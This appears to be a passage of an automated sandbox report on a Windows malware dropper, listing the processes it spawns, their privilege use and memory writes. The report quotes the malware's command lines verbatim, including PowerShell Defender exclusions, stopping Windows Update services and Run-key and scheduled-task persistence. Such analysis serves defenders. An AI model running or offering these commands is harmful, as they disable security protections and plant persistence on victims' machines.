neon.exe 4860 neon.exe 4860 neon.exe 1364 neonn.exe 1364 neonn.exe 2076 123264690.exe 3820 1658518264.exe 3820 1658518264.exe 4176 powershell.exe 3820 1658518264.exe 3820 1658518264.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe 3724 conhost.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
conhost.exeminesweeper.exepid process 3724 conhost.exe 5292 minesweeper.exe -
Suspicious behavior: SetClipboardViewer 2 IoCs
Processes:
sysppvrdnvs.exesysnldcvmr.exepid process 2104 sysppvrdnvs.exe 2796 sysnldcvmr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
4363463463464363463463463.exepowershell.exeTerminal_9235.exepowershell.execlient.exeneonn.exe%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exetasklist.exetasklist.exeInstallUtil.exe286830899.exeneon.exeneon.exe123264690.exespectrum.exeJava Updater.exepowershell.exeInstallUtil.execonhost.exepowershell.exedwm.exewindows.exeJava32.exejava.execrypted.exedropper64.exedescription pid process Token: SeDebugPrivilege 2432 4363463463464363463463463.exe Token: SeDebugPrivilege 3064 powershell.exe Token: SeDebugPrivilege 2516 Terminal_9235.exe Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 2284 client.exe Token: SeDebugPrivilege 1364 neonn.exe Token: SeDebugPrivilege 2500 %E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe Token: SeDebugPrivilege 5816 tasklist.exe Token: SeDebugPrivilege 5904 tasklist.exe Token: SeDebugPrivilege 6044 InstallUtil.exe Token: SeDebugPrivilege 4452 286830899.exe Token: SeDebugPrivilege 4788 neon.exe Token: SeDebugPrivilege 4860 neon.exe Token: SeDebugPrivilege 2076 123264690.exe Token: SeDebugPrivilege 1216 spectrum.exe Token: SeDebugPrivilege 3344 Java Updater.exe Token: SeDebugPrivilege 4176 powershell.exe Token: SeDebugPrivilege 5036 InstallUtil.exe Token: SeBackupPrivilege 5036 InstallUtil.exe Token: SeSecurityPrivilege 5036 InstallUtil.exe Token: SeSecurityPrivilege 5036 InstallUtil.exe Token: SeSecurityPrivilege 5036 InstallUtil.exe Token: SeSecurityPrivilege 5036 InstallUtil.exe Token: SeDebugPrivilege 3724 conhost.exe Token: SeDebugPrivilege 3928 powershell.exe Token: 33 3724 conhost.exe Token: SeIncBasePriorityPrivilege 3724 conhost.exe Token: SeLockMemoryPrivilege 872 dwm.exe Token: SeLockMemoryPrivilege 872 dwm.exe Token: 33 3724 conhost.exe Token: SeIncBasePriorityPrivilege 3724 conhost.exe Token: SeDebugPrivilege 1584 windows.exe Token: 33 3724 conhost.exe Token: SeIncBasePriorityPrivilege 3724 conhost.exe Token: SeBackupPrivilege 5036 InstallUtil.exe Token: SeSecurityPrivilege 5036 InstallUtil.exe Token: SeSecurityPrivilege 5036 InstallUtil.exe Token: SeSecurityPrivilege 5036 InstallUtil.exe Token: SeSecurityPrivilege 5036 InstallUtil.exe Token: SeDebugPrivilege 4400 Java32.exe Token: SeDebugPrivilege 4184 java.exe Token: SeDebugPrivilege 4420 crypted.exe Token: SeIncreaseQuotaPrivilege 4708 dropper64.exe Token: SeSecurityPrivilege 4708 dropper64.exe Token: SeTakeOwnershipPrivilege 4708 dropper64.exe Token: SeLoadDriverPrivilege 4708 dropper64.exe Token: SeSystemProfilePrivilege 4708 dropper64.exe Token: SeSystemtimePrivilege 4708 dropper64.exe Token: SeProfSingleProcessPrivilege 4708 dropper64.exe Token: SeIncBasePriorityPrivilege 4708 dropper64.exe Token: SeCreatePagefilePrivilege 4708 dropper64.exe Token: SeBackupPrivilege 4708 dropper64.exe Token: SeRestorePrivilege 4708 dropper64.exe Token: SeShutdownPrivilege 4708 dropper64.exe Token: SeDebugPrivilege 4708 dropper64.exe Token: SeSystemEnvironmentPrivilege 4708 dropper64.exe Token: SeRemoteShutdownPrivilege 4708 dropper64.exe Token: SeUndockPrivilege 4708 dropper64.exe Token: SeManageVolumePrivilege 4708 dropper64.exe Token: 33 4708 dropper64.exe Token: 34 4708 dropper64.exe Token: 35 4708 dropper64.exe Token: 33 3724 conhost.exe Token: SeIncBasePriorityPrivilege 3724 conhost.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
Faced.pifiexplore.exedwm.exejava.exeiexplore.exepid process 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 4856 iexplore.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 4184 java.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 5796 iexplore.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
Faced.pifdwm.exejava.exepid process 5984 Faced.pif 5984 Faced.pif 5984 Faced.pif 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 4184 java.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe 872 dwm.exe -
Suspicious use of SetWindowsHookEx 23 IoCs
Processes:
Java Updater.exeiexplore.exeIEXPLORE.EXEup.exejava.exeiexplore.exeIEXPLORE.EXEiexplore.exeIEXPLORE.EXEpid process 3344 Java Updater.exe 4856 iexplore.exe 4856 iexplore.exe 5020 IEXPLORE.EXE 5020 IEXPLORE.EXE 3320 up.exe 4184 java.exe 5796 iexplore.exe 5796 iexplore.exe 5924 IEXPLORE.EXE 5924 IEXPLORE.EXE 5924 IEXPLORE.EXE 5924 IEXPLORE.EXE 5924 IEXPLORE.EXE 5924 IEXPLORE.EXE 5924 IEXPLORE.EXE 5924 IEXPLORE.EXE 5924 IEXPLORE.EXE 5924 IEXPLORE.EXE 3348 iexplore.exe 3348 iexplore.exe 5796 IEXPLORE.EXE 5796 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
4363463463464363463463463.exepimer_bbbcontents7.exe1.exesysklnorbcv.execmd.execmd.exedescription pid process target process PID 2432 wrote to memory of 2644 2432 4363463463464363463463463.exe pimer_bbbcontents7.exe PID 2432 wrote to memory of 2644 2432 4363463463464363463463463.exe pimer_bbbcontents7.exe PID 2432 wrote to memory of 2644 2432 4363463463464363463463463.exe pimer_bbbcontents7.exe PID 2432 wrote to memory of 2644 2432 4363463463464363463463463.exe pimer_bbbcontents7.exe PID 2432 wrote to memory of 2532 2432 4363463463464363463463463.exe Session-https.exe PID 2432 wrote to memory of 2532 2432 4363463463464363463463463.exe Session-https.exe PID 2432 wrote to memory of 2532 2432 4363463463464363463463463.exe Session-https.exe PID 2432 wrote to memory of 2532 2432 4363463463464363463463463.exe Session-https.exe PID 2644 wrote to memory of 2020 2644 pimer_bbbcontents7.exe pimer_bbbcontents7.exe PID 2644 wrote to memory of 2020 2644 pimer_bbbcontents7.exe pimer_bbbcontents7.exe PID 2644 wrote to memory of 2020 2644 pimer_bbbcontents7.exe pimer_bbbcontents7.exe PID 2644 wrote to memory of 2020 2644 pimer_bbbcontents7.exe pimer_bbbcontents7.exe PID 2644 wrote to memory of 2020 2644 pimer_bbbcontents7.exe pimer_bbbcontents7.exe PID 2644 wrote to memory of 2020 2644 pimer_bbbcontents7.exe pimer_bbbcontents7.exe PID 2644 wrote to memory of 2020 2644 pimer_bbbcontents7.exe pimer_bbbcontents7.exe PID 2644 wrote to memory of 2020 2644 pimer_bbbcontents7.exe pimer_bbbcontents7.exe PID 2644 wrote to memory of 2020 2644 pimer_bbbcontents7.exe pimer_bbbcontents7.exe PID 2644 wrote to memory of 2020 2644 pimer_bbbcontents7.exe pimer_bbbcontents7.exe PID 2432 wrote to memory of 1676 2432 4363463463464363463463463.exe 1.exe PID 2432 wrote to memory of 1676 2432 4363463463464363463463463.exe 1.exe PID 2432 wrote to memory of 1676 2432 4363463463464363463463463.exe 1.exe PID 2432 wrote to memory of 1676 2432 4363463463464363463463463.exe 1.exe PID 2432 wrote to memory of 1816 2432 4363463463464363463463463.exe univ.exe PID 2432 wrote to memory of 1816 2432 4363463463464363463463463.exe univ.exe PID 2432 wrote to memory of 1816 2432 4363463463464363463463463.exe univ.exe PID 2432 wrote to memory of 1816 2432 4363463463464363463463463.exe univ.exe PID 1676 wrote to memory of 1756 1676 1.exe sysklnorbcv.exe PID 1676 wrote to memory of 1756 1676 1.exe sysklnorbcv.exe PID 1676 wrote to memory of 1756 1676 1.exe sysklnorbcv.exe PID 1676 wrote to memory of 1756 1676 1.exe sysklnorbcv.exe PID 2432 wrote to memory of 2036 2432 4363463463464363463463463.exe Armanivenntii_crypted_EASY.exe PID 2432 wrote to memory of 2036 2432 4363463463464363463463463.exe Armanivenntii_crypted_EASY.exe PID 2432 wrote to memory of 2036 2432 4363463463464363463463463.exe Armanivenntii_crypted_EASY.exe PID 2432 wrote to memory of 2036 2432 4363463463464363463463463.exe Armanivenntii_crypted_EASY.exe PID 2432 wrote to memory of 2948 2432 4363463463464363463463463.exe newtpp.exe PID 2432 wrote to memory of 2948 2432 4363463463464363463463463.exe newtpp.exe PID 2432 wrote to memory of 2948 2432 4363463463464363463463463.exe newtpp.exe PID 2432 wrote to memory of 2948 2432 4363463463464363463463463.exe newtpp.exe PID 2432 wrote to memory of 2516 2432 4363463463464363463463463.exe Terminal_9235.exe PID 2432 wrote to memory of 2516 2432 4363463463464363463463463.exe Terminal_9235.exe PID 2432 wrote to memory of 2516 2432 4363463463464363463463463.exe Terminal_9235.exe PID 2432 wrote to memory of 2516 2432 4363463463464363463463463.exe Terminal_9235.exe PID 2432 wrote to memory of 1616 2432 4363463463464363463463463.exe tpeinf.exe PID 2432 wrote to memory of 1616 2432 4363463463464363463463463.exe tpeinf.exe PID 2432 wrote to memory of 1616 2432 4363463463464363463463463.exe tpeinf.exe PID 2432 wrote to memory of 1616 2432 4363463463464363463463463.exe tpeinf.exe PID 1756 wrote to memory of 2992 1756 sysklnorbcv.exe cmd.exe PID 1756 wrote to memory of 2992 1756 sysklnorbcv.exe cmd.exe PID 1756 wrote to memory of 2992 1756 sysklnorbcv.exe cmd.exe PID 1756 wrote to memory of 2992 1756 sysklnorbcv.exe cmd.exe PID 1756 wrote to memory of 1000 1756 sysklnorbcv.exe cmd.exe PID 1756 wrote to memory of 1000 1756 sysklnorbcv.exe cmd.exe PID 1756 wrote to memory of 1000 1756 sysklnorbcv.exe cmd.exe PID 1756 wrote to memory of 1000 1756 sysklnorbcv.exe cmd.exe PID 2992 wrote to memory of 3064 2992 cmd.exe powershell.exe PID 2992 wrote to memory of 3064 2992 cmd.exe powershell.exe PID 2992 wrote to memory of 3064 2992 cmd.exe powershell.exe PID 2992 wrote to memory of 3064 2992 cmd.exe powershell.exe PID 1000 wrote to memory of 1436 1000 cmd.exe sc.exe PID 1000 wrote to memory of 1436 1000 cmd.exe sc.exe PID 1000 wrote to memory of 1436 1000 cmd.exe sc.exe PID 1000 wrote to memory of 1436 1000 cmd.exe sc.exe PID 1000 wrote to memory of 1960 1000 cmd.exe sc.exe PID 1000 wrote to memory of 1960 1000 cmd.exe sc.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Executes dropped EXE
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"C:\Users\Admin\AppData\Local\Temp\Files\pimer_bbbcontents7.exe"4⤵
- Executes dropped EXE
PID:2020
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Session-https.exe"C:\Users\Admin\AppData\Local\Temp\Files\Session-https.exe"3⤵
- Executes dropped EXE
PID:2532
-
-
C:\Users\Admin\AppData\Local\Temp\Files\1.exe"C:\Users\Admin\AppData\Local\Temp\Files\1.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\sysklnorbcv.exeC:\Windows\sysklnorbcv.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2992 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3064
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1436
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1960
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1968
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1752
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:872
-
-
-
C:\Users\Admin\AppData\Local\Temp\123264690.exeC:\Users\Admin\AppData\Local\Temp\123264690.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2076 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:2992
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:2816
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:944
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\781431589.exeC:\Users\Admin\AppData\Local\Temp\781431589.exe5⤵
- Executes dropped EXE
PID:1452
-
-
C:\Users\Admin\AppData\Local\Temp\1628723224.exeC:\Users\Admin\AppData\Local\Temp\1628723224.exe5⤵
- Executes dropped EXE
PID:3644
-
-
C:\Users\Admin\AppData\Local\Temp\1146015314.exeC:\Users\Admin\AppData\Local\Temp\1146015314.exe5⤵
- Executes dropped EXE
PID:2160
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"C:\Users\Admin\AppData\Local\Temp\Files\univ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe"C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2036
-
-
C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2948 -
C:\Windows\sysnldcvmr.exeC:\Windows\sysnldcvmr.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:2796 -
C:\Users\Admin\AppData\Local\Temp\1418522541.exeC:\Users\Admin\AppData\Local\Temp\1418522541.exe5⤵
- Executes dropped EXE
PID:2376 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:6008
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:5680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:6060
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:5412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2993410356.exeC:\Users\Admin\AppData\Local\Temp\2993410356.exe5⤵
- Executes dropped EXE
PID:3516
-
-
C:\Users\Admin\AppData\Local\Temp\775131445.exeC:\Users\Admin\AppData\Local\Temp\775131445.exe5⤵
- Executes dropped EXE
PID:4188
-
-
C:\Users\Admin\AppData\Local\Temp\2350019260.exeC:\Users\Admin\AppData\Local\Temp\2350019260.exe5⤵
- Executes dropped EXE
PID:3608
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Terminal_9235.exe"C:\Users\Admin\AppData\Local\Temp\Files\Terminal_9235.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2516 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "client" /tr '"C:\Users\Admin\AppData\Roaming\client.exe"' & exit4⤵PID:2648
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "client" /tr '"C:\Users\Admin\AppData\Roaming\client.exe"'5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2136
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpAD8E.tmp.bat""4⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2164 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:2464
-
-
C:\Users\Admin\AppData\Roaming\client.exe"C:\Users\Admin\AppData\Roaming\client.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"C:\Users\Admin\AppData\Local\Temp\Files\tpeinf.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1616 -
C:\Windows\sysppvrdnvs.exeC:\Windows\sysppvrdnvs.exe4⤵
- Modifies security service
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- System Location Discovery: System Language Discovery
- Suspicious behavior: SetClipboardViewer
PID:2104 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
PID:2528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2572
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵
- System Location Discovery: System Language Discovery
PID:2548 -
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2216
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2008
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3008
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2020
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1104
-
-
-
C:\Users\Admin\AppData\Local\Temp\286830899.exeC:\Users\Admin\AppData\Local\Temp\286830899.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4452 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:4536
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:4668
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:4612
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:4688
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\617623040.exeC:\Users\Admin\AppData\Local\Temp\617623040.exe5⤵
- Executes dropped EXE
PID:4040
-
-
C:\Users\Admin\AppData\Local\Temp\1423223895.exeC:\Users\Admin\AppData\Local\Temp\1423223895.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\1658518264.exeC:\Users\Admin\AppData\Local\Temp\1658518264.exe6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3820
-
-
-
C:\Users\Admin\AppData\Local\Temp\104116141.exeC:\Users\Admin\AppData\Local\Temp\104116141.exe5⤵
- Executes dropped EXE
PID:3620
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe"C:\Users\Admin\AppData\Local\Temp\Files\tn8cdkzn.exe"3⤵
- Executes dropped EXE
PID:1712
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Prototype.exe"C:\Users\Admin\AppData\Local\Temp\Files\Prototype.exe"3⤵
- Executes dropped EXE
PID:376
-
-
C:\Users\Admin\AppData\Local\Temp\Files\neonn.exe"C:\Users\Admin\AppData\Local\Temp\Files\neonn.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1364 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 10 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\neon.exe"4⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:5584 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 105⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5604
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "neon" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\neon.exe"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2056
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵PID:5688
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6044 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5036
-
-
-
C:\Users\Admin\AppData\Local\Temp\neon.exe"C:\Users\Admin\AppData\Local\Temp\neon.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4788 -
C:\Users\Admin\AppData\Local\Temp\neon.exe"C:\Users\Admin\AppData\Local\Temp\neon.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2704
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe"C:\Users\Admin\AppData\Local\Temp\Files\%E5%9B%9B%E6%96%B9%E5%B9%B3%E5%8F%B0-%E5%8D%A1%E5%95%86%E7%AB%AF.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2500 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://sms-szfang.com/register4⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5796 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5796 CREDAT:275457 /prefetch:25⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:5924
-
-
-
-
